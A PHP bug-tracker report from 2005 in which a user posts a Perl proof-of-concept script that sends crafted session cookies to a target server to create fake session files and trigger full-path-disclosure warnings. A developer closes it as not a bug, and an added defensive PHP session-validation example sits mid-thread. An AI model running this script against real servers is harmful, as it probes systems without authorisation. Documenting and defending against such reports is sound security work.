Bug #35429 problem with sessions..
Submitted: 2005-11-27 21:22 UTC Modified: 2005-11-27 23:50 UTC
From: sienicki dot kamil at gmail dot com Assigned:
Status: Not a bug Package: Unknown/Other Function
PHP Version: 4.4.1 OS: Linux/Windows (all?)
Private report: No CVE-ID: None
 [2005-11-27 21:22 UTC] sienicki dot kamil at gmail dot com
Description:
------------
I wrote a simple exploit to show this vuln.. (I think..)
Problem with sessions..

--
#!/usr/bin/perl
#
# PHP vulnerabilities..
# 
# Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki
# 
# I found two possibility of use that bug.. (maybe more)
# 
# display_errors must be On
#
use IO::Socket;

if(@ARGV < 3)
 {

  print "\n";
  print "PHP Exploit (POC)\n";
  print " by Kamil 'K3' Sienicki\n\n";
  print "1. Create fake session file (sess_fake) in directory (default /tmp). \n";
  print "2. Full path disclosure.\n\n";

  print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n";

exit;

 }

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80" ) || die "[-] Connect failed! \r\n";

if($ARGV[2] == 1)
 {
  print "\n";
  print "PHP Exploit (POC)\n";
  print " by Kamil 'K3' Sienicki\n\n";
  print "Name of session (default PHPSESSID): ";
  $sess = <stdin>;
  print "Name of fake sess_file: ";
  $fake = <stdin>;
  chomp($sess,$fake);
  print $socket "GET $ARGV[1] HTTP/1.0\n";
  print $socket "Cookie: $sess=$fake\n\n";
  print "'$fake' fake file was created.. \n";
 } elsif ($ARGV[2] == 2)
 {
   print "\n";
   print "PHP Exploit (POC)\n";
   print " by Kamil 'K3' Sienicki\n\n";
   print "Name of session (default PHPSESSID): ";
   $sess = <stdin>;
   chomp($sess); 
   print $socket "GET $ARGV[1] HTTP/1.0\n";
   print $socket "Cookie: $sess=@\n\n";
   while ($answer = <$socket>)
    {
     if ($answer =~ m/^...Warning/) 
      { 
        print $answer."\n";
      }
    }

}

--

Reproduce code:
---------------
<?php

session_start();

?>


Expected result:
----------------
Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3

Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0

Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0

Full path disclosure..
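The report above boils down to two things a defender controls: PHP warnings (which carry the script's filesystem path) being rendered into the response, and a client-supplied session id reaching the save handler unchecked. The following is an added example, not code from the bug report or from PHP itself, of a session bootstrap that closes both. It targets PHP 7.3 or later (the `session_start()` options array and the array form of `setcookie()` are assumed); the names `SESSION_ID_RE`, `is_valid_session_id` and `secure_session_start` are this example's own.

```php
<?php
// Added example (not from the bug report): a defensive session bootstrap.
// It applies the two mitigations that make the reported behaviour harmless:
//  1. never render PHP warnings (and the file paths they contain) to the client;
//  2. reject a malformed session id before session_start() hands it to the
//     save handler, so no "Failed to write session data" warning is raised.
// Names below (SESSION_ID_RE, is_valid_session_id, secure_session_start) are
// this example's own; PHP 7.3+ is assumed for the options-array calls.

declare(strict_types=1);

// 1. Errors go to the log, never into the response body. Setting these in
//    php.ini is preferable; ini_set() is used here so the example is self-contained.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// The warning quoted in the report lists a-z, A-Z and 0-9 as the only valid
// characters; current PHP additionally allows ',' and '-' depending on
// session.sid_bits_per_character. Adjust the class and length to the
// settings actually in use on the server.
const SESSION_ID_RE = '/^[a-zA-Z0-9,-]{22,256}$/';

function is_valid_session_id(string $id): bool
{
    return preg_match(SESSION_ID_RE, $id) === 1;
}

function secure_session_start(): void
{
    $name = session_name();   // PHPSESSID unless configured otherwise

    if (isset($_COOKIE[$name]) && !is_valid_session_id((string) $_COOKIE[$name])) {
        // Drop the bogus id (e.g. "@") instead of letting session_start() warn
        // about it. session_start() reads the id from $_COOKIE, so unsetting it
        // here means a fresh id is generated and the client-supplied value is
        // never used to build a file name under session.save_path.
        error_log(sprintf('rejected malformed session id from %s',
            $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        unset($_COOKIE[$name]);
        setcookie($name, '', ['expires' => time() - 3600, 'path' => '/']);
    }

    session_start([
        'use_strict_mode' => true,   // ids PHP did not issue itself are discarded too
        'cookie_httponly' => true,
        'cookie_samesite' => 'Lax',
    ]);
}

secure_session_start();
```

With `display_errors` off, the path disclosure tony2001 refers to below disappears for every warning, not just this one; the explicit id check is an extra layer that also keeps the rejected request visible in the error log for detection purposes.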


 [2005-11-27 21:29 UTC] tony2001@php.net
What exactly are you trying to exploit?
 [2005-11-27 23:46 UTC] sienicki dot kamil at gmail dot com
I think it is a small bug: when I send '@' as the session cookie, PHP shows the full path to the script.. when display_errors is on
 [2005-11-27 23:50 UTC] tony2001@php.net
Yeah, you can see full path to the script in 99.99999% of error messages.
No bug here.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon May 06 03:01:35 2024 UTC